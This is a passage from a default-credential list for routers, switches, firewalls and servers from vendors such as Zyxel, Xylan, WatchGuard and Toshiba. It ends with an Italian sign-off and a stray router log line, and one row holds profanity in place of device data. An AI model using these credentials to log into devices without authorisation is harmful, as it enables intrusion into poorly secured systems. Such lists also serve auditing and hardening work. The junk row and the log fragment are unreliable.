Terayon 	TeraLink 1000 Controller 	- 	admin 	password
Terayon 	TeraLink 1000 Controller 	- 	user 	password
Terayon 	TeraLink Getaway 	- 	user 	password
terayon 	- 	6.29 	admin 	nms
Terrayon 	- 	- 	- 	-
Titbas 	- 	SCO 	haasadm 	lucy99
TopLayer 	AppSwitch 2500 	Any 	siteadmin 	toplayer
Toshiba 	TR-650 	V2.01.00 	admin 	tr650
toshiba 	480cdt 	- 	- 	-
toshiba 	- 	- 	- 	-
TrendMicro 	ISVW (VirusWall) 	any 	admin 	admin
Trintech 	eAcquirer App/Data Servers 	- 	t3admin 	Trintech
Ullu ka pattha 	Gand mara 	Gandoo 	Bhosda 	Lund
USR 	TOTALswitch 	Any 	none 	amber
Vina Technologies 	ConnectReach 	3.6.2 	(none) 	(none)
voy 	- 	- 	- 	-
WatchGuard 	FireBox 	3-4.6 	- 	wg (touch password)
Webmin 	Webmin 	Any Unix/Lin 	admin 	-
Webramp 	410i etc... 	- 	wradmin 	trancell
Win2000 	Quick Time 4.0 	Englisch 	- 	-
Windows 98 se 	98 se 	- 	- 	-
Wireless Inc. 	WaveNet 2458 	n/a 	root 	rootpass
Xylan 	Omnistack 1032CF 	3.2.8 	admin 	password
Xylan 	Omnistack 4024 	3.4.9 	admin 	password
Xylan 	Omniswitch 	3.1.8 	admin 	switch
xyplex 	mx-16xx 	- 	setpriv 	system
Zyxel 	ISDN-Router Prestige 1000 	- 	- 	1234
zyxel 	prestige 300 series 	zynos 2.* 	- 	1234
Zyxel 	ISDN Router Prestige 100IH 	- 	- 	1234
Zyxel 	prestige 300 series 	any 	- 	-
Zyxel 	prestige 600 series 	any 	- 	-
ZYXEL 	641 ADSL 	- 	- 	1234
Zyxel 	prestige 128 modem-router 	any 	- 	1234
Zyxel 	ISDN-Router Prestige 1000 	- 	- 	-
Zyxel 	ISDN-Router Prestige 1000 	- 	- 	-

Spero siano utili a qualcuno


Nov/02/2006 15:38:05 Wireless PC connected 00-11-24-22-A9-AE